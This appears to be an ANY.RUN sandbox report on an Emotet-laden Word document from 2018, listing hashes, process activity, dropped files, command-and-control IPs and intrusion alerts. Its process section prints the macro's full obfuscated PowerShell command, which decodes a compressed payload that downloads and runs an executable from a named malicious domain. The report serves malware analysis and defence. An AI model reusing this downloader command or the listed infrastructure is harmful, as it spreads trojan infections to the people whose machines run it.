analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

Service-Report-3672

Full analysis: https://app.any.run/tasks/9bb18704-2fb3-40ac-89a8-9a8ed466dc75
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 22:07:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Jasmine-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 7 16:31:00 2018, Last Saved Time/Date: Wed Nov 7 16:31:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

0758FA5D46F06298FD767DAAB877DD9D

SHA1:

9639AD3EFA9C736B4C7C8E469D6D7D23C82DC672

SHA256:

C4DE60EC298B16F3B95C9D0364D265D0D5A4550A4B71F83745217D04FB744F64

SSDEEP:

768:sTBSVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9tcj2tAcnBnip:s9Socn1kp59gxBK85fBt+a9/PB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 866.exe (PID: 556)
      • 866.exe (PID: 4040)
      • lpiograd.exe (PID: 2364)
      • lpiograd.exe (PID: 3176)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3712)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3712)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 352)
    • EMOTET was detected

      • lpiograd.exe (PID: 3176)
    • Emotet process was detected

      • lpiograd.exe (PID: 2364)
    • Connects to CnC server

      • lpiograd.exe (PID: 3176)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 352)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 352)
      • 866.exe (PID: 4040)
    • Executes PowerShell scripts

      • CMD.exe (PID: 2892)
    • Starts itself from another location

      • 866.exe (PID: 4040)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3712)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3712)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:07 16:31:00
CreateDate: 2018:11:07 16:31:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Jasmine-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
6
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 866.exe no specs 866.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
3712"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Service-Report-3672.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2892CMD cmd.EXE /C"SeT OpG= (NEW-objEcT sYsTem.Io.compressiON.DeflaTESTREaM([Io.MemORySTReaM] [CONvErT]::FroMbaSE64STRIng( 'TZBBa8JAEIX/Sg4La0jdHARpXQJiROqhPagghV6SzZisJrtxd2LahPz3bkShl4F535s3zJCdKSMF7VSnZxDofQKyI6RxKUEhJ93mENECsV6EoUWA0qJJZF4gKKlyJnQV2nV8NcuHp21bJ2ZgUQqmAMNV9Tb7D08msWBcVQJcEx6e0DT23BhmmnCW5QUcuycQ0ioQ2lbgMu24kqVujrJ9XUqc0CX1OVntOy/y6Ot8TjnZfX1EBNRtgVDVAf2mwcgDyuAHKD9pA4koJuT9GntSeeONfo/mtyfuF2ytW1XqJNvIEu6eF28M9PlW3fQFplsXeld46nIufBAJiqIfhj8=' ),[io.COMpResSIoN.cOmPRessiONmOde]::deComprEsS ) ^|FOreacH{NEW-objEcT iO.sTreAMREaDer($_ , [TExt.enCoDING]::ASCIi ) }).READtOENd() ^| . ( ([StRiNG]$veRBOsEprEFerenCE)[1,3]+'X'-joiN'')&& pOWeRSHELL . ( ${ENV:`co`mspeC}[4,26,25]-joIn'' ) (( .( \"{0}{1}\" -f'ite','m' ) ( \"{2}{1}{0}\" -f'Opg',':','eNv' ) ).\"Val`UE\" )" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
352pOWeRSHELL . ( ${ENV:`co`mspeC}[4,26,25]-joIn'' ) (( .( \"{0}{1}\" -f'ite','m' ) ( \"{2}{1}{0}\" -f'Opg',':','eNv' ) ).\"Val`UE\" )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
556"C:\Users\admin\AppData\Local\Temp\866.exe" C:\Users\admin\AppData\Local\Temp\866.exepowershell.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
4040"C:\Users\admin\AppData\Local\Temp\866.exe"C:\Users\admin\AppData\Local\Temp\866.exe
866.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
2364"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
866.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
3176"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Version:
1, 4, 2, 50
Total events
1 669
Read events
1 256
Write events
408
Delete events
5

Modification events

(PID) Process:(3712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:t'&
Value:
74272600800E0000010000000000000000000000
(PID) Process:(3712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3712) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1298661393
(PID) Process:(3712) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661508
(PID) Process:(3712) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661509
(PID) Process:(3712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
800E00005E1DE371AF77D40100000000
(PID) Process:(3712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:?(&
Value:
3F282600800E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:?(&
Value:
3F282600800E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3712WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2FF4.tmp.cvr
MD5:
SHA256:
352powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NU9OIRMK2TXCRUI0NNNU.temp
MD5:
SHA256:
3712WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1178BF800A7E9A315A240C34A220AC74
SHA256:D9C88E977D14F6A961A1118B14A375E85A2D6FC2467D14A13161D3D2EBF0E8B7
352powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF183a93.TMPbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
352powershell.exeC:\Users\admin\AppData\Local\Temp\866.exeexecutable
MD5:DB230A6E1A5E2BB35C526DA462BD39F0
SHA256:30F7E202F871F54121C5D791FDDFC6B4FFDC86ABCBAC32D1B416C3FFB786D277
352powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
3712WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$rvice-Report-3672.docpgc
MD5:553C527080E51663670F0F4C85145F19
SHA256:8A28D7C3DA0B872F8340465D24CD463676B73D9DE9C443FE162EDE3F8C01F4E3
4040866.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:DB230A6E1A5E2BB35C526DA462BD39F0
SHA256:30F7E202F871F54121C5D791FDDFC6B4FFDC86ABCBAC32D1B416C3FFB786D277
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
352
powershell.exe
GET
200
216.172.183.202:80
http://steelstraightening.com/sDCqr/
US
executable
148 Kb
malicious
352
powershell.exe
GET
301
216.172.183.202:80
http://steelstraightening.com/sDCqr
US
html
398 b
malicious
3176
lpiograd.exe
GET
173.34.90.245:443
http://173.34.90.245:443/
CA
malicious
3176
lpiograd.exe
GET
12.139.46.57:80
http://12.139.46.57/
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3176
lpiograd.exe
173.34.90.245:443
Rogers Cable Communications Inc.
CA
malicious
3176
lpiograd.exe
12.139.46.57:80
Access Cable Television, Inc.
US
malicious
352
powershell.exe
216.172.183.202:80
steelstraightening.com
CyrusOne LLC
US
malicious

DNS requests

Domain
IP
Reputation
steelstraightening.com
  • 216.172.183.202
malicious

Threats

PID
Process
Class
Message
352
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
352
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
352
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
352
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3176
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info